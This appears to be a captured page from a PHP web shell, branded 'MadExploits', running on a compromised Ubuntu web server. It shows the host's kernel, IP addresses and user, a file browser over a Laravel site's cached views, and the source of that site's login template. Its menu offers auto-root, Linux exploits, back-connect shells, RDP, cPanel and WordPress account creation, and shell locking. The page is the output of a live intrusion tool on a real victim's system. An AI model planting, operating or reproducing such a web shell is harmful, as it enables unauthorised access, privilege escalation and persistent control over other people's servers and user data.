Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.141.33.133
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
storage /
framework /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitignore
14
B
-rwxrwxr-x
005acb7d0cbae21fd16e945dd95658...
7.65
KB
-rw-r--r--
023ea4f8bf912c683d942d25c36795...
18.65
KB
-rw-r--r--
02e712bf56a3a9186e5acd0242e2c6...
13.34
KB
-rw-r--r--
07d66a7a5576c5d7d307524c2eb684...
5.86
KB
-rw-r--r--
1acaab507b7cc33c910fc97324080d...
322
B
-rw-r--r--
2e2679e70c67a907119186a077ae2e...
6.4
KB
-rw-r--r--
2e57272f452e43f58b934126d7f57b...
180
B
-rw-r--r--
2fb8ece6a4f982968f08ba317686f8...
156
B
-rw-r--r--
3ccc1cb89d278bb565358f998b1bab...
179
B
-rw-r--r--
40d36b68346f0e574eafd48697e596...
719
B
-rw-r--r--
422ae55fe2a7692c6a7b53ecb883cb...
5.98
KB
-rw-r--r--
4fdeb802560663a61ae92cfa4ac0de...
9.88
KB
-rwxrwxr-x
54f88584e2f679eaa8b260873067d3...
2.53
KB
-rw-r--r--
56405f04039bc5a5a07d7006684ae0...
1.98
KB
-rw-r--r--
654290133e68cd3b04bc74b82bc72d...
1.34
KB
-rw-r--r--
723bab2f348287236041891f378084...
5.35
KB
-rw-r--r--
795ff5da76351a134dd2273e8df022...
2.44
KB
-rw-r--r--
7a1777652607b8c97f12b4629fdd73...
155
B
-rw-r--r--
7fa5c0c8d4507da161a5fb3ca97c4c...
1.76
KB
-rw-r--r--
8362690ccea6efd9102ab7ed399866...
15.69
KB
-rwxrwxr-x
85868dd5edd348f809fdbae3329606...
13.2
KB
-rw-r--r--
a094570f1b6485c512ce8ba79d3f2a...
309
B
-rw-r--r--
a394c37f265ab90a427e194cd3955f...
16.6
KB
-rw-r--r--
a39c4e66f14f0888db23626bb2a68b...
2.13
KB
-rw-r--r--
a48b6cbacbf3fbce11e4479360af53...
13.26
KB
-rw-r--r--
acaf3d82efd67f924877c30c022804...
5.69
KB
-rw-r--r--
c1ca5354e2d6bb6a2b6abe58428e34...
429
B
-rw-r--r--
c5718edef6e73426fbe2ff80d73468...
663
B
-rw-r--r--
c84c3c5c6008e4c404cb64dc7b60ba...
10.48
KB
-rw-r--r--
d4192c11e21323c0e045e394a97366...
379
B
-rw-r--r--
d4bf5fa1986ae8ae2088b03cb2966b...
14.43
KB
-rw-r--r--
d7240a877194c60633d675848010aa...
8.23
KB
-rw-r--r--
dcf9ba91b8d1e773540333182b6872...
998
B
-rw-r--r--
de1d7ee884859283d04951b7f65aec...
16.01
KB
-rw-r--r--
f2f1195f45d0efd51b3a0955ea7c8c...
423
B
-rw-r--r--
f4b2ee329b4b057feae78eca6c7f21...
26.03
KB
-rw-r--r--
f6038d0e0231bf089ddd2095bf7961...
8.48
KB
-rw-r--r--
fb22e2f6bf16e543be0837f9cca04d...
3.28
KB
-rw-r--r--
googleda794cd9937527d01.html
43
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2e2679e70c67a907119186a077ae2e97b2faa42e.php
<?php $__env->startSection('stylesheets'); ?> <?php echo \Illuminate\View\Factory::parentPlaceholder('stylesheets'); ?> <link rel="stylesheet" href="/css/login.css"> <style> .cta-text { font-size: 1.1em; } @media (max-width: 767px) { .d-flex.d-flex-min { display: block !important; } } @media (min-width: 767px) { .b-owner { margin-left: 10px; } } </style> <?php $__env->stopSection(); ?> <?php $__env->startSection('load'); ?> <?php $__env->stopSection(); ?> <?php $__env->startSection('content'); ?> <div class="auth-login-wrapper"> <h3 style="padding-bottom: 20px;">Login to continue</h3> <div class=""> <main class="main"> <div class="d-flex d-flex-min"> <p class="mb-1">Don't have an account? <a href="<?php echo e(route('register')); ?>" class="text-primary cta-text">Sign Up</a></p> <p class="mb-4 b-owner">Business Owner? <a href="https://place.cravvings.com/login" class="text-primary cta-text">Sign in here</a></p> </div> <form class="login-form" action="<?php echo e(route('login')); ?>" method="POST"> <?php echo csrf_field(); ?> <div class="row"> <?php if(isset($error)): ?> <div class="alert-error"> <?php echo e($error); ?> </div> <?php endif; ?> <div class="col-sm-12 mb-2"> <div class="form-group"> <label for="email">Email Address</label> <input type="email" name="email" class="login-input login-form-control id="email" placeholder="Enter email address" value="<?php echo e($fields['email'] ?? ''); ?>" autofocus> <?php if(isset($errorbag) && isset($errorbag['email'])): ?> <span class="invalid-feedback" role="alert"> <strong><?php echo e($errorbag['email'][0]); ?></strong> </span> <?php endif; ?> </div> </div> <div class="col-sm-12 mb-2"> <div class="form-group"> <label for="password">Password</label> <input type="password" name="password" class="login-input login-form-control <?php echo e($errors->has('password') ? 'input--invalid' : ''); ?>" id="password" placeholder="Enter password"> <?php if(isset($errorbag) && isset($errorbag['password'])): ?> <span class="invalid-feedback" role="alert"> <strong><?php echo e($errorbag['password'][0]); ?></strong> </span> <?php endif; ?> </div> </div> <div class="col-sm-12 mb-2"> <button type="submit" name="submit" class="login-btn button-primary w-100">Log in</button> </div> <div class="col-sm-12 mb-2 text-center position-relative pt-2 pb-3 px-0"> <a href="/password/reset" style="font-size: 1rem;">Reset Password</a> </div> <div class="col-sm-12 mb-2 text-center position-relative pt-2 pb-3 px-0"> <hr class="mw-100 position-absolute z-index-100" style="width:calc(100% - 30px);margin-left:15px;"> <small class="px-3 background--light position-relative z-index-105">Or sign in with:</small> </div> <div class="social-auths"> <div class="mb-2 login-btn-brand-container" style="padding-left: 15px;"> <a href="<?php echo e(route('socialLogin', ['provider' => 'facebook'])); ?>" class="login-btn login-btn-brand login-btn-facebook w-100" style="background-color: #3f5d94"><i class="fa fa-facebook mr-1"></i> Facebook</a> </div> <div class="mb-2 login-btn-brand-container" style="padding-right: 15px;"> <a href="<?php echo e(route('socialLogin', ['provider' => 'google'])); ?>" class="login-btn login-btn-brand login-btn-google-white border w-100"> <figure class="d-inline-block mr-1 mb-0"> <svg viewBox="0 0 48 48" width="16" height="16" class="google-icon display-block" data-reactid="93"> <defs data-reactid="94"> <clipPath id="clip-path" data-reactid="95"> <path fill="none" d="M44.5,20H24v8.5H35.8C34.7,33.9,30.1,37,24,37a13,13,0,0,1,0-26,12.72,12.72,0,0,1,8.1,2.9l6.4-6.4A22,22,0,1,0,24,46c11,0,21-8,21-22A18.25,18.25,0,0,0,44.5,20Z" data-reactid="96"></path> </clipPath> </defs> <g clip-path="url(#clip-path)" data-reactid="97"> <path style="fill:#fbbc05;" d="M0,37V11L17,24Z" data-reactid="98"></path> </g> <g clip-path="url(#clip-path)" data-reactid="99"> <path style="fill:#ea4335;" d="M0,11,17,24l7-6.1L48,14V0H0Z" data-reactid="100"></path> </g> <g clip-path="url(#clip-path)" data-reactid="101"> <path style="fill:#34a853;" d="M0,37,30,14l7.9,1L48,0V48H0Z" data-reactid="102"></path> </g> <g clip-path="url(#clip-path)" data-reactid="103"> <path style="fill:#4285f4;" d="M48,48,17,24l-4-3L48,11Z" data-reactid="104"></path> </g> </svg> </figure> Google </a> </div> </div> </div> </form> </main> <footer class="mt-6"> <small>© 2021 - Cravvings. All rights reserved.</small> </footer> </div> </div> <?php $__env->stopSection(); ?> <?php $__env->startSection('javascript'); ?> <script src="/js/side.js"></script> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.plains', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /var/www/html/stage/resources/views/auth/login.blade.php ENDPATH**/ ?>
Close